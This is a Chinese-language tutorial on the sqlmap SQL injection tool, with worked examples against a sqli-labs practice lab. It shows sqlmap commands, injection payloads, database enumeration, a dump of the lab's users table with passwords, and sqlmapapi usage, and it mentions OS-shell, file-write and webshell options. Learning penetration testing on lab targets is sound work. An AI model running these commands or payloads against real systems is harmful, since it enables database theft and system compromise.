sqlmap简介
一款自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB
Sqlmap安装
- 官网地址:https://sqlmap.org/
- github地址:https://github.com/sqlmapproject/sqlmap
- 下载解压后,在当前路径下打开cmd界面
- 输入
python sqlmap.py -h
- 如果有显示帮助参数信息,表示可以直接使用。
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmap.py -h
___
__H__
___ ___[,]_____ ___ ___ {1.8.6.3#dev}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: sqlmap.py [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
......
参数介绍
参数 | 说明 |
---|---|
-u | 目标URL |
-d | 连接数据库 |
–dbs | 列出所有的数据库 |
–current-db | 列出当前的数据库 |
–tables | 列出当前的表 |
–columns | 列出当前的列 |
-D | 选择使用哪个数据库 |
-T | 选择使用哪个表 |
-C | 选择使用哪个列 |
–dump | 获取字段中的数据 |
–dump-all | 拖库 |
–batch | 自动选择Yes |
–smart | 快速判断(扫得快) |
–forms | 尝试post注入 |
-r | 加载文件中的HTTP请求(本地保存的请求包txt文件) |
-l | 加载文件中的HTTP请求(本地保存的请求包日志文件) |
-g | 自动获取Google搜索的前一百个结果,对GET参数的URL测试 |
-o | 开启所有默认性优化 |
–tamper | 调佣脚本进行注入 |
-v | 显示提示信息 [0-6]级 ,默认为1 |
–delay | 设置多久访问一次 |
–os-shell | 获取主机shell |
-m | 批量操作 |
-c | 制定配置文件 |
-data | data指定的数据会当做post数据提交 |
-timeout | 设置超时时间 |
–technique | 盲注选择(当你知道注入的类型是盲注,可以选择) B:布尔型 E:报错型 U:联合型 S:(二次注入)读取系统文件等等 T:时间延迟注入 |
–is-dba | 判断是否是root权限 |
–users | 所有数据库用户 |
–current-user | 当前数据库用户 |
–proxy http://localhost:8080 | 添加代理 |
–threads 10 | 并发数 |
–sql-shell | 交互式sql的shell |
-level | [1-5]级,级别越高越详细 |
–os-shell | 交互式的操作系统的shell |
–file-read | 读取文件 |
–file-write | 写入文件 |
–file-dest | 写入到网站的绝对路径 |
示例
Less-1
- 查询基本信息和注入点
# 命令:python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/?id=1"
# 得到结果:
# 系统参数
# web server operating system: Windows
# web application technology: Apache 2.4.23, PHP 5.4.45
# back-end DBMS: MySQL >= 5.0
#
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/?id=1"
___
__H__
___ ___[(]_____ ___ ___ {1.8.6.3#dev}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:19:09 /2024-06-19/
[16:19:10] [INFO] resuming back-end DBMS 'mysql'
[16:19:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3438=3438 AND 'OtUZ'='OtUZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 9482 FROM(SELECT COUNT(*),CONCAT(0x71716a6271,(SELECT (ELT(9482=9482,1))),0x716a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pMvu'='pMvu
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1079 FROM (SELECT(SLEEP(5)))favz) AND 'rGAe'='rGAe
---
[16:19:12] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.4.45
back-end DBMS: MySQL >= 5.0
[16:19:12] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\10.196.93.67'
[*] ending @ 16:19:12 /2024-06-19/
- 查询服务器所有数据库
python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/? id=1" --dbs
# 结果
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/? id=1" --dbs
available databases [8]:
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] pikachu
[*] security
[*] test
- 查询security数据库中的所有表
python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/? id=1" -D "security" --tables
# 结果:
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/? id=1" -D "security" --tables
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
- 查询users表中的数据
python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/? id=1" -D "security" -T "users" --dump
# 结果
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/? id=1" -D "security" -T "users" --dump
[16 entries]
+----+------------+----------------------+
| id | password | username |
+----+------------+----------------------+
| 1 | Dumb | Dumb |
| 2 | I-kill-you | Angelina |
| 3 | p@ssword | Dummy |
| 4 | crappy | secure |
| 5 | stupidity | stupid |
| 6 | genious | superman |
| 7 | mob!le | batman |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dumbo | dhakkan |
| 14 | admin4 | admin4 |
| 22 | e | a |
| 33 | v | v |
| 34 | 123456 | v'union select 1,use |
+----+------------+----------------------+
Less-2
- 默认选择Yes
python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-2/?id=1" --batch
- 快速扫描
# python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/?id=1" --batch --smart
___
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/?id=1" --batch --smart
___
__H__
___ ___[,]_____ ___ ___ {1.8.6.3#dev}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:19:50 /2024-06-20/
[08:19:50] [INFO] resuming back-end DBMS 'mysql'
[08:19:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3438=3438 AND 'OtUZ'='OtUZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 9482 FROM(SELECT COUNT(*),CONCAT(0x71716a6271,(SELECT (ELT(9482=9482,1))),0x716a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pMvu'='pMvu
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1079 FROM (SELECT(SLEEP(5)))favz) AND 'rGAe'='rGAe
---
[08:19:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[08:19:52] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\10.196.93.67'
Less-11
- 尝试POST注入
# python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-11" --forms
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-11" --forms
___
__H__
___ ___[)]_____ ___ ___ {1.8.6.3#dev}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:24:09 /2024-06-20/
[08:24:09] [INFO] testing connection to the target URL
got a 301 redirect to 'http://10.196.93.67/sqli-labs/Less-11/'. Do you want to follow? [Y/n] y
[08:24:13] [INFO] searching for forms
[1/1] Form:
POST http://10.196.93.67/sqli-labs/Less-11
POST data: uname=&passwd=&submit=Submit
do you want to test this form? [Y/n/q]
> y
Edit POST data [default: uname=&passwd=&submit=Submit] (Warning: blank fields detected): uname=33&passwd=333&submit=Submit
......
- 通过请求包的方式注入
- 使用抓包工具找到需要注入的请求,再需要注入的参数后面添加*号,并保存到本地的txt文件中。
POST /sqli-labs/Less-11/ HTTP/1.1
Host: 10.196.93.67
Content-Length: 32
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.196.93.67
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.196.93.67/sqli-labs/Less-11/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9a1nmutffn2ucra7rlo7b0vaq1
Connection: keep-alive
uname=aa*&passwd=aa*&submit=Submit
- 执行语句
# python sqlmap.py -r ./texts/less11.txt
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmap.py -r ./texts/less11.txt
___
__H__
___ ___[(]_____ ___ ___ {1.8.6.3#dev}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:32:35 /2024-06-20/
[08:32:35] [INFO] parsing HTTP request from './texts/less11.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
......
- 指定data数据
python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-11" --data=“uname=1*&passwd=1*”
Less-8
- 布尔盲注
python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-8" --technique B
Less-9
- 时间盲注
python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-9" --technique T
写入文件到网站目录中
- 一句话木马
sqlmapApi
一、连接
- 参数
- 运行
# 通过cmd窗口执行sqlmapap.py文件
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmapapi.py
Usage: sqlmapapi.py [options]
Options:
-h, --help show this help message and exit
-s, --server Run as a REST-JSON API server
-c, --client Run as a REST-JSON API client
-H HOST, --host=HOST Host of the REST-JSON API server (default "127.0.0.1")
-p PORT, --port=PORT Port of the REST-JSON API server (default 8775)
--adapter=ADAPTER Server (bottle) adapter to use (default "wsgiref")
--database=DATABASE Set IPC database filepath (optional)
--username=USERNAME Basic authentication username (optional)
--password=PASSWORD Basic authentication password (optional)
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>
- 开启服务
- 方式一( 默认)
# python sqlmapapi.py -s
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmapapi.py -s
[09:31:57] [INFO] Running REST-JSON API server at '127.0.0.1:8775'..
[09:31:57] [INFO] Admin (secret) token: cac6ad6380a7cb62254ceecfd2656ee8
[09:31:57] [DEBUG] IPC database: 'C:\Users\ADMINI~1\AppData\Local\Temp\sqlmapipc-_tai1v4v'
[09:31:57] [DEBUG] REST-JSON API server connected to IPC database
[09:31:57] [DEBUG] Using adapter 'wsgiref' to run bottle
- 方式二:指定ip和端口
# python sqlmapapi.py -s -H "10.196.93.66" -p 10005
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmapapi.py -s -H "10.196.93.66" -p 10005
[09:35:11] [INFO] Running REST-JSON API server at '10.196.93.66:10005'..
[09:35:11] [INFO] Admin (secret) token: f4aaa71f7e1e90a807cdb69d4efa4ffd
[09:35:11] [DEBUG] IPC database: 'C:\Users\ADMINI~1\AppData\Local\Temp\sqlmapipc-594mghoc'
[09:35:11] [DEBUG] REST-JSON API server connected to IPC database
[09:35:11] [DEBUG] Using adapter 'wsgiref' to run bott
- 客户端连接
# python E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6\sqlmapapi.py -c -p 10005 -H "10.196.93.66"
C:\>python E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6\sqlmapapi.py -c -p 10005 -H "10.196.93.66"
[09:41:30] [DEBUG] Example client access from command line:
$ taskid=$(curl http://10.196.93.66:10005/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid
$ curl -H "Content-Type: application/json" -X POST -d '{"url": "http://testphp.vulnweb.com/artists.php?artist=1"}' http://10.196.93.66:10005/scan/$taskid/start
$ curl http://10.196.93.66:10005/scan/$taskid/data
$ curl http://10.196.93.66:10005/scan/$taskid/log
[09:41:30] [INFO] Starting REST-JSON API client to 'http://10.196.93.66:10005'...
[09:41:30] [DEBUG] Calling 'http://10.196.93.66:10005'
[09:41:30] [INFO] Type 'help' or '?' for list of available commands
api>
二、基本操作
- 帮助信息
# help
api> help
help Show this help message
new ARGS Start a new scan task with provided arguments (e.g. '[37mnew -u "http://testphp.vulnweb.com/artists.php?artist=1"[0m')
use TASKID Switch current context to different task (e.g. '[37muse c04d8c5c7582efb4[0m')
data Retrieve and show data for current task
log Retrieve and show log for current task
status Retrieve and show status for current task
option OPTION Retrieve and show option for current task
options Retrieve and show all options for current task
stop Stop current task
kill Kill current task
list Display all tasks
version Fetch server version
flush Flush tasks (delete all tasks)
exit Exit this client
api>
- 新建扫描对象
# Less-1
# 命令:new -u "http://10.196.93.67/sqli-labs/Less-1/? id=1"
# 扫描任务的编号 :0fa3537a1438b002
# 可以对多个任务进行扫描,通过ID号区分
api> new -u "http://10.196.93.67/sqli-labs/Less-1/? id=1"
[09:48:05] [DEBUG] Calling 'http://10.196.93.66:10005/task/new'
[09:48:05] [INFO] New task ID is '0fa3537a1438b002'
[09:48:05] [DEBUG] Calling 'http://10.196.93.66:10005/scan/0fa3537a1438b002/start'
[09:48:05] [INFO] Scanning started
api ([31m0fa3537a1438b002[0m)>
- 查看扫描任务列表
# 命令:list
# 当前任务数:2
# 标志为terminated表示扫描完成
# 标志为running表示正在扫描
api ([96mfc4886ebf0b41d37[0m)> list
[09:51:03] [DEBUG] Calling 'http://10.196.93.66:10005/admin/list'
{
"success": true,
"tasks": {
"0fa3537a1438b002": "terminated",
"fc4886ebf0b41d37": "running"
},
"tasks_num": 2
}
- 切换任务
# 命令: use + id
api ([35mca38f40e2b20260f[0m)> list
[09:57:02] [DEBUG] Calling 'http://10.196.93.66:10005/admin/list'
{
"success": true,
"tasks": {
"0fa3537a1438b002": "terminated",
"fc4886ebf0b41d37": "terminated",
"ca38f40e2b20260f": "running"
},
"tasks_num": 3
}
api ([35mca38f40e2b20260f[0m)> use 0fa3537a1438b002
[09:57:13] [INFO] Switching to task ID '0fa3537a1438b002'
api ([31m0fa3537a1438b002[0m)>
- 判断是否存在注入
# 命令:data
# 如果在返回数据中的第二个data中有数据的话,表示存在注入
- 查询MySQL存在数据库
new -u "http://10.196.93.67/sqli-labs/Less-1/? id=1" --dbs
注意:查看返回结果也可以将data中url复制到JSON可视化工具中,方便查看。
扩展
SQL注入自动化其他工具
Pangolin(穿山甲)
pangolin是一款帮助渗透测试人员进行sql注入(sql injeciton)测试的安全工具。pangolin与jsky(web应用安全漏洞扫描器,v web应用安全评估工具)都是nosec公司的产品。pangolin具备友好的图形界面以及支持测试几乎所有数据库(access,mssql,mysql,oracle.informix,db2,sybase.postgresql.sqlite).pangolin能够通过一系列非常简单的操作,达到最大化的攻击测试效果。它从检测注入开始到最后控制目标系统都给出了测试步骤。pangolin是目前国内使用率最高的sql注入测试的安全软件。